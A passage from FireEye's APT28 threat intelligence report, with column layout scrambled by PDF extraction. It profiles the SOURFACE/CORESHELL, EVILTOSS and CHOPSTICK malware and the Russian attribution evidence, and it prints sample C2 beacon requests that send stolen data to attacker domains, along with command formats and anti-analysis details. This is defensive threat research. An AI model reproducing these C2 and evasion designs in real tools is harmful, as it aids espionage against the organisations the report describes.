                             Some of APT28’s more commonly used tools are            •	   CHOPSTICK: This is a modular implant
                             the SOURFACE downloader, its second stage                    compiled from a software framework that
                             backdoor EVILTOSS, and a modular family of                   provides tailored functionality and flexibility.
                             implants that we call CHOPSTICK.




19 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



                             A number of the malware variants that we profile     •	   One of the latest samples of CORESHELL
                             below, especially the CHOPSTICK family,                   includes counter-reverse engineering tactics
                             demonstrate formal coding practices indicative of         via unused machine instructions. This would
                             methodical, diligent programmers. The modularity          hinder static analysis of CORESHELL behavior
                             of CHOPSTICK alone, with its flexible and lasting         by creating a large amount of unnecessary
                             platform, demonstrates planning for long-term             noise in the disassembly.
                             use and versatility. We have also noted that         •	   A number of CORESHELL droppers also
                             APT28 tailors implants to their target                    conduct runtime checks, attempting to
                             environments, configuring them to use local               determine if they are executing in an analysis
                             network resources such as email servers.                  environment, and if so, they do not trigger
                                                                                       their payloads.
                             APT28 has attempted to obfuscate their code and      •	   Many samples across the SOURFACE/
                             implement counter-analysis techniques:                    CORESHELL, CHOPSTICK, and EVILTOSS




   Figure 6: Typical deployment of SOURFACE ecosystem




                           Spearphishing Email




                         Document with exploit




                             Dropper malware




                        SOURFACE downloader                                      Obtains 2nd stage              C2 Server




                     Deploys 2nd stage droppers




                             2nd stage implant




20 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



                                   malware families obfuscate strings that are       APT28 has made incremental and systematic
                                   decoded at runtime. Two of the malware            changes to the SOURFACE downloader and its
                                   families (SOURFACE/CORESHELL and                  surrounding ecosystem since as early as 2007.
                                   EVILTOSS) use the same decryption                 These changes indicate a long-standing and
                                   sequence and similar algorithms for string        dedicated development effort behind APT28. We
                                   encoding and decoding. These families             have observed samples of the SOURFACE
                                   encode their strings at compile time using a      downloader compiled between 2007 and 2014.
                                   custom stream cipher. From a high level,          We call SOURFACE (samples are frequently
                                   these ciphers share a similar design across       named netids.dll) a first stage downloader
                                   the malware families but differ slightly in the   because its primary job is to retrieve a second
                                   internal arithmetic operations.                   stage payload from a C2 server. Until 2013, the
                             •	    APT28 has employed RSA encryption to              SOURFACE downloader used hard-coded IP
                                   protect files and stolen information moved        addresses for C2 communications, whereas the
                                   from the victim’s network to the controller.      future CORESHELL samples use domains.




EVOLUTION OF
SOURFACE ECOSYSTEM
INDICATES SYSTEMATIC DEVELOPMENT


WHAT IS A MALWARE ECOSYSTEM?
First, a malware family is a collection of malware in which each sample shares a significant
amount of code with all of the others. There are exceptions: for example, some files
contain public and standard code libraries that we do not take into consideration
when making a family determination.
A malware ecosystem is a group of malware families that work together to perform
the same objective. Perhaps the simplest and most typical ecosystem
is a dropper and a backdoor that are used together. They may not share the
same code structure, but they are related because one drops and installs
the other.
The ecosystem surrounding the SOURFACE downloader frequently
consists of a dropper, which installs SOURFACE. The SOURFACE
downloader then receives another dropper from its C2 server, and
this second dropper installs a second stage backdoor, which is
usually EVILTOSS.




21 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



In April 2013, based on compile time, the group
began to make significant alterations to the                                 Figure 7: Example of modified SOURFACE vs. CORESHELL communications
SOURFACE downloader. They started by
changing the compiled DLL name to “coreshell.dll”
and making minor changes to the network
communications, as seen in Figure 7.                                         SOURFACE URL for a sample compiled April 2013:
                                                                             http://[hostname]/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-05_01
The hostname, volume serial number and OS
version data are encoded in the new URL format.                              CORESHELL URL for a sample compiled April 2013:
As seen in the table below, the SOURFACE/                                    http://[hostname]/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ1MDUwMQ==
CORESHELL developers also made other
modifications that changed the exported function
name and file size over time.



 Table 4: Evolution of SOURFACE downloader over time




 MD5                                                        Size             Compile Date                                        Export Name                    Notes

 272f0fde35dbdfccbca1e33373b3570d                           11264            2013-04-16 10:49:25 UTC                             Init1                          17




 8b92fe86c5b7a9e34f433a6fbac8bc3a                           14848            2013-08-06 07:53:03 UTC                             Initialize                     18




 9eebfebe3987fec3c395594dc57a0c4c                           12800            2013-08-14 10:48:59 UTC                             Initialize                     19




 da2a657dc69d7320f2ffc87013f257ad                           12800            2013-08-21 07:52:10 UTC                             Initialize                     Same as previous.


 1259c4fe5efd9bf07fc4c78466f2dd09                           12800            2013-10-03 09:21:10 UTC                             Initialize                     Same as previous.


 3b0ecd011500f61237c205834db0e13a                           43520            2014-02-13 16:29:36 UTC                             Applicate                      20




 5882fda97fdf78b47081cc4105d44f7c                           45056            2014-05-13 15:18:24 UTC                             Applicate                      21




 791428601ad12b9230b9ace4f2138713                           45056            2014-05-13 16:42:26 UTC                             Applicate                      Same as previous.


 ead4ec18ebce6890d20757bb9f5285b1                           45056            2014-07-25 15:44:04 UTC                             Applicate                      Same as previous.


 48656a93f9ba39410763a2196aabc67f                           112640           2014-07-30 11:13:24 UTC                             Applicate                      22




 8c4fa713c5e2b009114adda758adc445                           112640           2014-07-30 11:13:24 UTC                             Applicate                      Same as previous.



                             17
                                SOURFACE with minor changes to network communications (see Figure 7).
                             18
                                Basic anti-debug measures added (process listing, rand timing, is DebuggerPresent).
                             19
                                Switches from loading a secondary DLL (netui.dll/WinIDS.dll) to uploading the contents of %temp%\chkdbg.log.
                             20
                                Statically links msvcrt library.
                             21
                                Statically links msvcrt library and the strings used to identify the imported libraries and functions are reversed prior to being used, then reversed back after use.
                             22
                                This version added assembly level obfuscation, which slows down analysis. This variant requires the OS to be at least Windows Vista.




22 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



In April 2013, based on compile time, the
group began to make significant alterations to
the SOURFACE downloader.




   Figure 8: NATO-themed decoy
   delivered with possible EVILTOSS
   predecessor from 2004




                              Variants of the SOURFACE second stage                                                Interestingly, we found an antivirus report from
                              backdoor, EVILTOSS, share some code similarities                                     200423 detailing what appears to be an early
                              with SOURFACE. However, it contains more                                             variant of EVILTOSS. The backdoor was installed
                              capabilities, including the ability to provide access                                alongside the NATO-themed decoy document
                              to the file system and registry, enumerate network                                   depicted in Figure 8. The backdoor sent data via
                              resources, create processes, log keystrokes, access                                  SMTP to nato_smtp@mail[.]ru and received its
                              stored credentials, and execute shellcode. The                                       tasking via POP from nato_pop@mail[.]ru.
                              backdoor encrypts data that it uploads with an RSA                                   Although we have not conclusively attributed
                              public key. Many of its variants we have seen are                                    this sample to APT28, it does suggest the
                              named netui.dll. EVILTOSS variants may use the                                       possibility that APT28 has been operating since
                              Simple Mail Transfer Protocol (SMTP) to send                                         as early as 2004.24
                              stolen data in an attachment named “detaluri.
                              dat”. The backdoor attaches this file to a
                              preformatted email and sends it out through a
                              victim’s mail server.

                              23	
                                     http://ae.norton.com/security_response/print_writeup.jsp?docid=2004-081915-1004-99
                              24	
                                    Although the malware family and interest in NATO make it likely that APT28 was involved, we cannot conclusively attribute this sample to APT28 based on
                                    these factors alone. We have no evidence that they controlled the C2 for this malware or were using EVILTOSS in 2004. APT28 could have possibly obtained
                                    this source code from another group of actors. Also, malware can be passed from group to group. The other malware that we associate with APT28 in this
                                    paper is more strongly attributed to the group using additional factors, some of which we mention in Appendix A.



23 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



MODULAR IMPLANTS
INDICATE A FORMAL
DEVELOPMENT
ENVIRONMENT




A modular development framework                                                    CHOPSTICK variants may move messages and
                                                                                   information using at least three methods:
suggests the group has had an organized
development effort since as early as 2007.                                         1.	   Communications with a C2 server using
                                                                                         HTTP. These protocols are covered in more
                                                                                         detail in Appendix D.
                                                                                   2.	   Email sent through a specified mail server.
                                                                                         One CHOPSTICK v1 variant contained



                             D
                                      uring our research, we discovered that             modules and functions for collecting
                                      APT28 uses a backdoor developed using a            keystroke logs, Microsoft Office documents,
                                      modular framework. We call this                    and PGP files. The monitoring for new files of
                             backdoor CHOPSTICK, a somewhat ironic name                  interest is performed by a “Directory
                             that comes from our semi-random name                        Observer” module. In one sample this
                             generator. The modular design allows flexible               information was intended to be sent via
                             options for compiling variants with different               SMTP using a Georgian MIA mail server. It
                             capabilities as needed, as well as deploying                used one of four embedded sender email
                             additional capabilities at runtime. This allows the         addresses (@mia.gov.ge) to send files via
                             developers to make targeted implants, including             email to another email address on the same
                             only the capabilities and protocols necessary for a         mail server. All information required for the
                             specific environment. Such a modular framework              email was hardcoded in the backdoor.
                             suggests the group has had an organized               3.	   Local copying to defeat closed networks.
                             development effort since as early as 2007. A                One variant of CHOPSTICK focuses on
                             formal development environment, in which code is            apparent air gap / closed network capabilities
                             versioned and well-organized, would almost                  by routing messages between local
                             certainly be required to track and define the               directories, the registry and USB drives.
                             various modules that can be included in the
                             backdoor at compile time.




24 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APT28 MALWARE
INDICATES RUSSIAN
SPEAKERS IN A
RUSSIAN TIME ZONE




                             D
                                      uring our research into APT28’s malware,                            interface items in a specific language.25 Non-default
                                      we noted two details consistent across                              language settings packaged with PE resources are
                                      malware samples. The first was that                                 dependent on the developer’s build environment.
                             APT28 had consistently compiled Russian language                             Each PE resource includes a “locale” identifier with
                             settings into their malware. The second was that                             a language ID “composed of a primary language
                             malware compile times from 2007 to 2014                                      identifier indicating the language and a sublanguage
                             corresponded to normal business hours in the UTC                             identifier indicating the country/region.”26
                             + 4 time zone, which includes major Russian cities
                             such as Moscow and St. Petersburg.                                           At the time of the writing of this paper, we had
                                                                                                          identified 103 malware samples that were both
                             Use of Russian and English Language                                          attributed to APT28 and contained PE resources.
                             Settings in PE Resources                                                     Table 5 shows the locale identifiers27 with
                             PE resources include language information that                               associated language and country/region for
                             can be helpful if a developer wants to show user                             these samples.




 Table 5: Locale and language identifiers associated with APT28 malware



                                                                                                                                                   Number of APT28
 Locale ID	               Primary language                                                            Country/Region
                                                                                                                                                   samples

 0x0419                   Russian (ru)                                                                Russia (RU)                                  59

 0x0409                   English (en)                                                                United States (US)                           27

 0x0000 or 0x0800         Neutral locale / System default locale language                             Neutral                                      16

                          English (en)                                                                United Kingdom (GB)                          1
 0x0809

                             25
                               Microsoft Developer Network – Multiple Language Resources http://msdn.microsoft.com/en-us/library/cc194810.aspx
                                Microsoft Developer Network – Language Identifier Constants and Strings http://msdn.microsoft.com/en-us/library/dd318693.aspx
                             26, 27




25 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?


                               The samples with Russian language settings were           with Russian language settings at least some of
                               compiled between late 2007 and late 2013, as              the time and made no effort to obscure this
                               depicted in Figure 9. This consistency over a             detail. Overall, the locale IDs suggest that
                               long timeframe suggests that the developers of            APT28 developers can operate in both Russian
                               APT28 malware were using a build environment              and English.




Figure 9: Number of APT28 samples with Russian language settings by compile month

 2007              December

 2008              March

                   May

                   August

 2009              February

                   May

                   September

 2010              February

                   March

                   August

                   September

                   October

                   November

                   December

 2011              April

                   June

                   September

                   December

 2012              April

                   May

                   June

                   July

                   October

                   December

 2013              January

                   July

                   August

                   October

                   November

                   December

                                  0	        1	        2	       3	        4	         5	        6	       7	        8	       9




26 fireeye.com
  APT 28: A Window into Russia’s Cyber Espionage Operations?



  Compile Times Align with Working
  Hours in Moscow and St. Petersburg
   Of the 140 malware samples that we have
  attributed to APT28 so far, over 89% were
  compiled between 0400 and 1400 UTC time, as
  depicted in Figure 10. Over 96% were compiled
  between Monday and Friday. This parallels the
  working hours in UTC+0400 (that is, compile
  times begin about 8AM and end about 6PM in this
  time zone). This time zone includes major Russian
  cities such as Moscow and St. Petersburg.
                                                                    13:00                  14:00              15:00              16:00




  Figure 10: Compile Times of APT28 malware in UTC Time


            20



            18

                                                                                                                  Moscow business hours

            16



            14
FREQUENCY




            12



            10



            8



            6



            4



            2




                 0   1	   2   3	   4   5   6    7     8    9   10    11     12   13   14     15    16   17   18   19   20   21   22      23   24

                                                               TIME OF DAY (UTC)


  27 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



CONCLUSION
We started researching APT28 based on activity               APT28’s characteristics—their targeting, malware,
we observed on our clients’ networks, similar to             language, and working hours—have led us to
other targeted threat groups we have identified              conclude that we are tracking a focused, long-
over time. We assess that APT28 is most likely               standing espionage effort. Given the available
sponsored by the Russian government. We                      data, we assess that APT28’s work is sponsored
summarize our key observations about APT28 in                by the Russian government.
Figure 11 below.



Figure 11: Summary of key observations about APT28

 MALWARE
 Evolves and Maintains Tools for Continued, Long-Term Use
 •	 Uses malware with flexible and lasting platforms
 •	 Constantly evolves malware samples for continued use
 •	 Malware is tailored to specific victims’ environments, and is designed to hamper reverse engineering efforts
 •	 Development in a formal code development environment
 Various Data Theft Techniques
 •	 Backdoors using HTTP protocol
 •	 Backdoors using victim mail server
 •	 Local copying to defeat closed/air gapped networks

 TARGETING
 Georgia and the Caucasus
 •	 Ministry of Internal Affairs
 •	 Ministry of Defense
 •	 Journalist writing on Caucasus issues
 •	 Kavkaz Center
 Eastern European Governments & Militaries
 •	 Polish Government
 •	 Hungarian Government
 •	 Ministry of Foreign Affairs in Eastern Europe
 •	 Baltic Host exercises
 Security-related Organizations
 •	 NATO
 •	 OSCE
 •	 Defense attaches
 •	 Defense events and exhibitions
 RUSSIAN ATTRIBUTES
 Russian Language Indicators
 •	 Consistent use of Russian language in malware over a period of six years
 •	 Lure to journalist writing on Caucasus issues suggests APT28 understands both Russian and English
 Malware Compile Times Correspond to Work Day in Moscow’s Time Zone
 •	 Consistent among APT28 samples with compile times from 2007 to 2014
 •	 The compile times align with the standard workday in the UTC + 4 time zone which includes major Russian cities such
    as Moscow and St. Petersburg




28 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APPENDIX A:
DISTINGUISHING
THREAT GROUPS




                             We use the term “threat group” to refer to actors       Threat actors leave behind various forensic
                             who work together to target and penetrate               details. They may send spear phishing emails from
                             networks of interest. These individuals may share       a specific IP address or email address. Their emails
                             the same set of tasks, coordinate targets, and          may contain certain patterns; files have specific
                             share tools and methodology. They work together         names, MD5 hashes, timestamps, custom
                             to gain access to their targets and steal data.         functions, and encryption algorithms. Their
                                                                                     backdoors may have command and control IP
                             The art of attributing disparate intrusion activities   addresses or domain names embedded. These are
                             to the same threat group is not always simple.          just a few examples of the myriad of forensic
                             Different groups may use similar intrusion              details that we consider when distinguishing one
                             methodologies and common tools, particularly            threat group from another.
                             those that are widely available on the Internet,
                             such as pwdump, HTran, or Gh0st RAT. There may          At the most basic level, we say that two intrusion
                             be overlaps between groups caused by the sharing        events are attributed to the same group when we
                             of malware or exploits they have authored, or           have collected enough indicators to show beyond
                             even the sharing of personnel. Individual threat        a reasonable doubt that the same actor or group
                             actors may move between groups either                   of actors were involved. We track all of the
                             temporarily or permanently. A threat actor may          indicators and significant linkages associated with
                             also be a private citizen who is hired by multiple      identified threat groups in a proprietary database
                             groups. Multiple groups, on occasion, compromise        that comprises millions of nodes and linkages
                             the same target within the same timeframe.              between them. In this way, we can always go back
                                                                                     and answer “why” we associated cyber threat
                             Distinguishing one threat group from another is         activity with a particular group.
                             possible with enough information, analytical
                             experience, and tools to piece it all together. We
                             can analyze multiple incidents and tell by the
                             evidence left behind that a given incident was the
                             result of one threat group and not another.




29 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APPENDIX B:
TIMELINE OF
APT28 LURES




 YEAR LURE TOPIC                                                                                            MALWARE
 2010      Iran’s work with an international organization (internal document)                               SOURFACE

                                                                                                            SOURFACE,
 2011      File named “military cooperation.doc”
                                                                                                            OLDBAIT

 2011      Georgian language IT document for Ministry of Internal Affairs (internal document)               SOURFACE

           “USB Disk Security is the best software to block threats that can damage your PC or compromise
 2011                                                                                                       SOURFACE
           your personal information via USB storage.”
 2012      Food security in Africa (“Food and nutrition crisis reaches peak but good forecast for 2013”)    SOURFACE

 2012      “IDF Soldier Killed and another injured in a Terror Attack”                                      SOURFACE

 2012      “Echo Crisis Report” on Portugal’s forest fires                                                  SOURFACE

 2012      “FBI to monitor Facebook, Twitter, Myspace”                                                      SOURFACE

 2012      Georgia (US state, not the country of Georgia) murder case uncovers terror plot                  SOURFACE

 2012      Military attaches in London (internal document)                                                  SOURFACE

                                                                                                            CHOPSTICK,
 2013      South Africa MFA document
                                                                                                            CORESHELL

 2013      John Shalikashvili (Georgian-Polish-American US General) Questionnaire                           CORESHELL

 2013      Asia Pacific Economic Cooperation Summit 2013 reporters (internal document)                      SOURFACE

                                                                                                            CHOPSTICK,
 2013      Defense Attaches in Turkey (internal document)
                                                                                                            CORESHELL
                                                                                                            CHOPSTICK,
 2013      Turkish Cypriot news about Syria chemical weapons
                                                                                                            CORESHELL

 2013      Georgian language document about drivers’ licenses (internal document)                           EVILTOSS

 2013      Apparent Reason Magazine-related lure sent to a journalist                                       CORESHELL

 2014      Mandarin language document, possibly related to a Chinese aviation group (non-public document)   CORESHELL

 2014      Netherlands-Malaysia cessation of hostilities; related to Ukraine airline attack                 CORESHELL



30 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APPENDIX C:
SOURFACE/CORESHELL




                              SOURFACE is a downloader that obtains a second        two payloads. Messages are sent using HTTP
                              stage backdoor from a C2 server. Over time the        POST requests whose bodies contain encrypted
                              downloader has evolved and the newer versions,        and Base64 encoded data. The encryption
                              usually compiled with the DLL name ‘coreshell.dll’,   algorithm is a custom stream cipher using a
                              are distinct enough from the older versions that      six-byte key. Commands from the controller to the
                              we refer to it as SOURFACE/CORESHELL or               CORESHELL implant are encrypted using another
                              simply CORESHELL. This appendix focuses on            stream cipher but this time using an eight-byte
                              these newer versions.                                 key. CORESHELL has used the same user agent
                                                                                    string (“MSIE 8.0”) that SOURFACE previously
                              CORESHELL uses two threads to communicate             used, but in more recent samples CORESHELL
                              with its C2 server. The first thread sends beacons    uses the default Internet Explorer user agent
                              that contain the process listing of the               string obtained from the system. Figure 11 shows
                              compromised host. The second thread is                an example POST request.
                              responsible for downloading and executing stage




                                Figure 11: Example CORESHELL POST request




                                POST /check/ HTTP/1.1
                                User-Agent: MSIE 8.0
                                Host: adawareblock.com
                                Content-Length: 58
                                Cache-Control: no-cache


                                zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY=




31 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             When Base64 decoded, the POST content looks like this:

                             00000000 cd 77 ae 62 af ac ab 69 b5 6b 91 dc ab 20 b9 65 .w.b...i.k... .e
                             00000010 de b2 ac 2d 96 35 82 fd f3 d5 82 1e c7 bd a8 ee ...-.5..........
                             00000020 9c ee 9a 30 ac e5 21 e4 a6 ...0..!..


                             The key used to encrypt the message is six bytes long and is appended to the end of the message. In this is
                             example the key would be: 30 ac e5 21 e4 a6. When the message is decrypted, the resulting plaintext is:

                             00000000 00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68 .rhdnzxdfmF6f5ah
                             00000010 34 78 67 30 34 30 33 30 35 30 31 1a 00 00 00 23 4xg04030501....#
                             00000020 00 00 00 ...


                             The following table contains a breakdown of each of the field’s C2 message.



 Table 6: Example CORESHELL beacon structure



 Offset	      Value                    Description

 00           00                       Command byte:
                                       0 - Command request
                                       1 - Process listing
 01           “rhdn”                   Unknown - Potentially a campaign identifier. Values seen so far: “rhze”, “rhdn” and “mtfs”.
 05           “zxdfmF6f5ah4xg”         Hostname of compromised system

 13           “0403”                   Unknown - Potentially a version number. This number is hardcoded within the implant.
 17           “05”                     OS Major version

 19           “01”                     OS Minor version
 1B           0x0000001a               Header length minus the command byte (LE DWORD)
 1F           0x00000023               Length of the entire message (LE DWORD)




32 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             Commands are sent from the C2 server to the CORESHELL backdoor in HTTP responses to the POST
                             requests. The command is identified by the NULL terminated UNICODE string “OK” (O\x00\K\x00\x00\
                             x00). The command is Base64 encoded and immediately follows the “OK” string. Figure 12 shows a
                             sample CORESHELL command:


                                Figure 12: Example CORESHELL controller response




                                HTTP/1.1 200 OK
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 58

                                O.K...AQAAAKqqAQEBAQEBAQEVzPMEUUIzQtND8kOSRLVEVUV0RRRGN0bX




                             The Base64 decoded string is:

                             00000000 01 00 00 00 AA AA 01 01 01 01 01 01 01 01 10 41 ........ .......A
                             00000010 70 41 10 42 33 42 D3 43 F2 43 92 44 B5 44 55 45 pA.B3B.C .C.D.DUE
                             00000020 74 45 14 46 37 46 D7 tE.F7F.


                             The following table contains a description of each field in the command message:


                               Table 7: CORESHELL C2 message structure



                               Offset	      Value                        Description

                               00           0x00000001                   Constant value, must be set to 1 (LE DWORD)

                               04           AA AA                        Unknown - not referenced
                               06           01 01 01 01 01 01 01 01      Encryption key (8 bytes)

                               0E           10 41 70 41 10 42 33...      Encrypted command


33 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             When the above command “10 41 70 41 10 42 33…” is decrypted using the key “01 01 01 01 01
                             01 01 01” the following command message is produced:


                             00000000 04 CC C2 04 00 42 42 42 42 43 43 43 43 44 44 44 .....BBBBCCCCDDD
                             00000010 44 45 45 45 45 46 46 46 46                      DEEEEFFFF


                             The implant supports the following four command identifiers from the controller as seen in Table 8. The
                             first byte of the command message specifies the command type and is immediately followed by the PE or
                             shellcode to be executed. In this example the command byte is 04 indicating the following bytes are
                             shellcode. If the command byte was 01, 02, or 03 the following bytes would be a DLL or EXE that would
                             be written to disk and executed.



 Table 8: CORESHELL commands



 Command ID           Description

 01                   Save command data as %LOCALAPPDATA%\svchost.exe and execute using CreateProcess.

 02                   Save command data as %LOCALAPPDATA%\conhost.dll and execute using “rundll32.exe \”%s\”,#1”.
 03                   Save command data as %LOCALAPPDATA%\conhost.dll and execute using LoadLibrary.

 04                   Command data is a shell code and is executed using CreateThread.




34 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APPENDIX D:
CHOPSTICK




                              CHOPSTICK is a backdoor that uses a modularized, object-oriented framework written in C++. This
                              framework allows for a diverse set of capabilities across malware variants sharing a common code base.
                              CHOPSTICK may communicate with external servers using SMTP or HTTP. This appendix documents
                              variants using HTTP communications.

                              The first time CHOPSTICK is executed, it may encrypt and store configuration data in the Registry key
                              HKU\S-1-5-19_Classes\Software\Microsoft\MediaPlayer\{E6696105-E63E-4EF1-939E-
                              15DDD83B669A}\chnnl. The user HKU\S-1-5-19 corresponds to the LOCAL_SERVICE account SID.
                              The configuration block is encrypted using RC4 encryption. The key is a combination of a 50-byte static
                              key and a four-byte salt value randomly generated at runtime. The static key is derived from opcodes in
                              the backdoor.

                              CHOPSTICK collects detailed information from the host including the Windows version, CPU
                              architecture, Windows Firewall state, User Account Control (UAC) configuration settings on Windows
                              Vista and above and Internet Explorer settings. It also tests for the installation of specific security
                              products (Table 9) and applications (Table 10).



                              Table 9: Endpoint security products detected by CHOPSTICK



                              Service Name	                                        Security Product

                              Acssrv                                               Agnitum Client Security

                              AVP                                                  Kaspersky
                              SepMasterService                                     Symantec

                              McAfeeService                                        McAfee
                              AntiVirService                                       Avira
                              Ekrn                                                 ESET
                              DrWebAVService                                       Dr. Web Enterprise Security
                              MBAMService                                          Malwarebytes Anti-Malware




35 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




 Table 10: Applications detected by CHOPSTICK



 Process Name	                                               Application

 firefox.exe                                                 Mozilla Firefox

 iexplore.exe                                                Internet Explorer
 outlook.exe                                                 Microsoft Outlook

 opera.exe                                                   Opera Browser
 bat.exe                                                     Unknown
 msimn.exe                                                   Outlook Express
 vpngui.exe                                                  Cisco Anyconnect VPN client
 ipseca.exe                                                  IPsec VPN client
 ipsecc.exe                                                  IPsec VPN client
 openvpn.exe                                                 OpenVPN client
 openssl.exe                                                 OpenSSL
 openvpn-gui-1.0.3.exe                                       OpenVPN client
 msmsgs.exe                                                  Microsoft Messenger
 wuauclt.exe                                                 Windows Update
 chrome.exe                                                  Google Chrome Browser
 thebat.exe                                                  The Bat Secure Email Client
 skype.exe                                                   Skype Messenger




36 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             After collecting host information, CHOPSTICK creates a hidden file that may be named
                             %ALLUSERSPROFILE%\edg6EF885E2.tmp for temporary storage and creates a Windows mailslot with the
                             name “check_mes_v5555”.28 Its usage of a Windows mailslot would potentially allow external binaries to
                             write data to the “check_mes_v5555” mailslot, possibly allowing CHOPSTICK to encrypt and store
                             output from other malware. It creates a thread that records user activity on the host, capturing desktop
                             screenshots in JPEG format, tracks current window focus, collects keystrokes, and scrapes window
                             contents (text, context menus, etc.). User activity is captured once every 500 milliseconds and logged in
                             an HTML-like format. The thread writes user activity log messages to the “check_mes_v5555” mailslot in
                             plain text. CHOPSTICK reads messages from the mailslot, encrypts them using RC4, and then stores the
                             encrypted message in an edg6EF885E2.tmp temporary file. The RC4 encryption used here also uses a 50-
                             byte static key plus four-byte random salt value.

                             After approximately 60 seconds of execution time, CHOPSTICK begins communicating with one of its C2
                             servers over HTTP. After sending an initial HTTP GET request it uploads the file contents of edg6EF885E2.
                             tmp to the C2 server using HTTP POST requests. It does not wait for a response from the server to begin
                             uploading. Once the contents of edg6EF885E2.tmp are uploaded, CHOPSTICK deletes the file. Figure 13
                             below contains an example of an HTTP POST request uploading a segment from edg6EF885E2.tmp.


                                  Figure 13: Sample CHOPSTICK v2 HTTP POST




                                  POST /search/?btnG=D-3U5vY&utm=79iNI&ai=NPVUnAZf8FneZ2e_qptjzwH1Q&PG3pt=n-
                                  B9onK2KCi HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
                                  Accept-Language: en-us,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101
                                  Firefox/20.0
                                  Host: windows-updater.com
                                  Content-Length: 77
                                  Cache-Control: no-cache


                                  1b2x7F4Rsi8_e4N_sYYpu1m7AJcgN6BzDpQYv1P2piFBLBqghXiHY3SIfe8cUHHYojeXfeyyOhw==


                             28
                               A mailslot is a Windows inter-process communication (IPC) mechanism similar to a named pipe, but is designed for one-way communications between
                               processes and can also be used across the network.


37 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             CHOPSTICK uses a URL-safe Base64 encoding, using an alphabet that substitutes “+” and “/” for “-” and
                             “_”, respectively. Each HTTP request contains multiple Base64 encoded URL parameters, however only
                             one parameter contains information encoded by the malware (“ai=”) and the rest of the URL parameters
                             appear to be randomly generated per request.

                              CHOPSTICK encrypts an 11-byte sequence in the “ai=” parameter. The purpose of this parameter
                             appears to be to uniquely identify the particular instance of the backdoor to the C2 server. The Base64
                             encoded text of this parameter begins with a number of randomly generated alphabetical characters
                             presumably intended to prevent people from Base64 decoding the whole string without some knowledge
                             of how the malware family works. The first four bytes of the message are an XOR key for the remainder of
                             the data. Once decrypted using the XOR key, an 11-byte sequence is revealed. The first seven bytes are
                             static, and are hard-coded in CHOPSTICK, while the last four bytes appear to be unique.

                             The message body of the POST request is also Base64 encoded. This encoded string is also prefixed with
                             random characters designed to break the output of a Base64 decode operation on the entire string. The
                             first 15 bytes of the decoded message body comprise another 11-byte sequence similar to the sequence
                             stored in the “ai=” parameter as described above. Decrypting these bytes yields another static seven-byte
                             sequence, followed by four unique bytes. The remainder of the message body consists of the RC4
                             encrypted data containing the HTML-formatted user activity log, edg6EF885E2.tmp.

                             After uploading edg6EF885E2.tmp, CHOPSTICK continues to query its C2 servers for commands using
                             HTTP GET requests. The malware contains code which allows it to load or memory-map external modules
                             that export the following functions: SendRawPacket, GetRawPacket, InitializeExp, DestroyExp,
                             IsActiveChannel, GetChannelInfo, SetChannelInfo, Run, GetModuleInfo, GiveMessage,
                             and TakeMessage.




38 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             Modularity
                             CHOPSTICK backdoors are compiled within a modularized development framework. This means that
                             two separate CHOPSTICK backdoors may contain vastly different functionality, depending on which
                             modules were included at compile time. The modules that are included in an instance of CHOPSTICK
                             may be reported to the C2 server as part of POST messages. Figure 14 includes an example from a
                             CHOPSTICK v1 variant:



                                Figure 14: Sample CHOPSTICK v1 HTTP POST including module identification




                                POST /webhp?rel=psy&hl=7&ai=d2SSzFKlR4l0dRd_ZdyiwE17aTzOPeP-PVsYh1lVAXpLhIebB4=
                                HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Accept-Language: en-us,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101
                                Firefox/20.0
                                Host: adobeincorp.com
                                Content-Length: 71
                                Cache-Control: no-cache


                                d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0Pi__0u3Sf1Oh30_HufqHiDU=




39 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             To decode the POST content, the first step is to remove characters from the Base64 string (the number of
                             characters to remove may vary between different communication channels). In the example from Figure
                             14, the number of characters removed is seven. Once these characters are removed the decoded (but
                             still encrypted) text looks like this:

                             00000000 72 11 fd 22 f8 dc 33 9e 5e 40 24 db 31 b5 40 53 r..”..3.^@$.1.@S
                             00000010 b9 91 d0 82 ba a4 d3 ab 6c 5a 05 ec 1a f4 3e 2f ........lZ....>/
                             00000020 ff d2 ed d2 7f 53 a1 df 4f c7 b9 fa 87 88 35 .....S..O.....5


                             The first two words (“72 11” and “fd 22”) are checksums that are used to validate the message. The next 4
                             bytes “f8 dc 33 9e” are a salt value that is appended to the end of an RC4 key. Once decrypted, the
                             message looks like the following:

                             00000000 72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57 r..”..3.V4MGNxZW
